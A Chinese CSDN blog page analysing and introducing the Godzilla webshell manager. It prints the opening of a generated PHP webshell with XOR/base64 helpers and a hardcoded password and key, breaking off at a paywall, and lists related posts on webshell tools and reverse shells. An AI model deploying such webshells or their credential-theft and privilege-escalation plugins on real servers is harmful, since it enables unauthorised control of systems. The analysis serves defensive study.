哥斯拉Godzilla Shell管理工具使用,马分析,特征分析(4K屏不好用,Webshell)

已于 2022-08-25 16:32:31 修改
阅读量7.6k 收藏 13
点赞数
分类专栏: 安全工具 文章标签: web安全
于 2022-04-18 15:57:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012206617/article/details/124248618
版权
安全工具 专栏收录该内容
183 篇文章 71 订阅 ¥19.90 ¥99.00
订阅专栏
本文详细分析了哥斯拉Godzilla Webshell管理工具的马分析,包括其利用逻辑、特征以及简单使用方法。哥斯拉具备流量加密、数据库管理、内存shell、屏幕截图等特性,且提供多种插件模块,如JMeterpreter、ServletManage等,增强了Webshell的安全性和隐蔽性。
摘要由CSDN通过智能技术生成

目录

马分析

正文

总结一下木马的利用逻辑:

总结木马特征:

简单使用方法

一些特性

流量加密

插件模块

数据库管理

内存shell

屏幕截图

虚拟终端

JMeterpreter​

ServletManage ​

JarLoader​

JZip​

ByPassOpenBasedir​

BypassDisableFunctions ​

笔记

ShellCodeLoader

SafetyKatz

lemon

BadPotato ​

SharpWeb​

SweetPotato​

其他选项

参考文献

作者:BeichenDream

马分析

正文

先贴一下哥斯拉V2.83生成的PHP马(选择了base64作为加密方式)

<?php
    session_start(); 
    @set_time_limit(0);  
	@error_reporting(0);  
    function E($D,$K){  
        for($i=0;$i<strlen($D);$i++) {
            $D[$i] = $D[$i]^$K[$i+1&15];
        }
        return $D;
    }
    function Q($D){
        return base64_encode($D);
    }
    function O($D){
        return base64_decode($D);
    }
    $P='pass';
    $V='payload';
    $T='3c6e0b8a9c15224a';
    if (isset($_POST[$P])){
了解本专栏 订阅专栏 解锁全文
墨痕诉清风
关注
专栏目录
订阅专栏
29-3 哥斯拉安装使用
weixin_43263566的博客
03-22 976
哥斯拉是一个基于流量、HTTP全加密的webshell管理工具,具有以下特点:在服务端支持open_ssl时,"冰蝎"使用AES加密算法,密钥长度为16位,也可称为AES-16。这种加密方式在软件及硬件上都能快速地进行加解密,内存需求低,非常适合用于流量加密。下载地址:GitHub - BeichenDream/Godzilla: 哥斯拉
哥斯拉Godzilla shell管理工具
weixin_50464560的博客
09-03 3095
各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell, 于是团队的BeiChenDream师傅开发了这款“哥斯拉“  本文出自ChaBug Y4er师傅   简单使用方法 在哥斯拉安装之前,你需要安装jdk1....
哥斯拉Godzilla使用中基于PHP的加密流量分析
zlloveyouforever的博客
02-23 2752
webshell连接工具哥斯拉在连接过程中的简单流量分析
渗透测试-webshell工具哥斯拉下载安装和使用教程
最新发布
who_im_i的博客
08-18 424
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。
哥斯拉Godzilla webshell管理工具
None安全团队
12-14 2万+
各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell, 于是团队的BeiChenDream师傅开发了这款“哥斯拉“ 本文出自ChaBug Y4er师傅 简单使用方法 在哥斯拉安装之前,你需要安装jdk1.8的环境。双击Godzilla.jar打开,此时会在同目录下生成data.db数据库存放数据。首页长这样 点击管理–添加生...
Web安全-Godzilla哥斯拉Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 5161
Web安全-Godzilla哥斯拉Webshell管理工具使用
剖析哥斯拉WebShell管理工具
MachineGunJoe666
09-15 384
本篇主要分析哥斯拉工具生成以及二开方面的内容。
哥斯拉PHP分析
zeros__的博客
12-22 4948
前言: 因为工作而分析主机侧安全产品的告警时,除了种类繁多的误报,见到的最多的就是冰蝎和哥斯拉。判断冰蝎一般通过到"AES"几个字母后,看上下文是不是类似: "file_get_contents("XXX"), "AES", $_SESSION['k']"。 但是判断是不是哥斯拉, ...
Godzilla(哥斯拉)安装与使用
剁椒鱼头没剁椒的博客
12-22 7673
这里介绍可以直接看作者的对软件的介绍,这里就不复述了,复述也是类似抄一遍,没准还没说对。
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
Godzilla
10-25
Godzilla
Godzilla-t00ls.jar
09-01
各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell,于是@BeichenDream决定公开他所开发的一款shell权限管理工具,名为“哥斯拉”。 各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell,于是@BeichenDream决定公开他所开发的一款shell权限管理工具
攻击工具分析哥斯拉(Godzilla)1
08-03
哥斯拉(Godzilla)攻击工具分析哥斯拉,这个名字听起来颇具震撼力,而在这个网络攻防的领域中,它并非电影里的巨型怪兽,而是一款强大的Webshell管理工具哥斯拉是由Java语言编写,继承了诸如菜刀、蚁剑、冰蝎...
kingkong:解密哥斯拉webshell管理工具流量
04-16
解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员...
WebShell介绍(蚁剑&哥斯拉工具使用
DMXA的博客
12-10 714
该文章仅用于信息网络安全防御技术学习,请勿用于其他用途! 该文章为纯技术分享,严禁利用本文章所提到的技术进行非法攻击!
哥斯拉Godzilla 下载安装和使用(超详细)
热门推荐
这个人什么都没有写~
05-18 3万+
网上搜到的哥斯拉安装的文章千篇一律,甚至一个字都没变。作为一个新手,这些文章在某些方面没办法解决我的问题,在这里总结一下我的步骤。 文章目录前言一、下载安装二、使用 前言 本文包括哥斯拉的下载、安装,以及利用upload-labs-master的第一关练习使用哥斯拉。(使用其他环境也可,自行选择一个上传漏洞环境就好) (upload-labs请自行上网搜索下载教程,也可在github上下载,本文使用phpstudy搭建环境) 一、下载安装 登录github官网,搜索godzilla。 点击第一个,.
webshell管理工具-哥斯拉( Godzilla)的安装和基础使用
黄乔国PHP
03-15 5051
可见其强大之处,具体介绍可以在github上面去了解:https://github.com/BeichenDream/Godzilla
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1401
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

墨痕诉清风

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值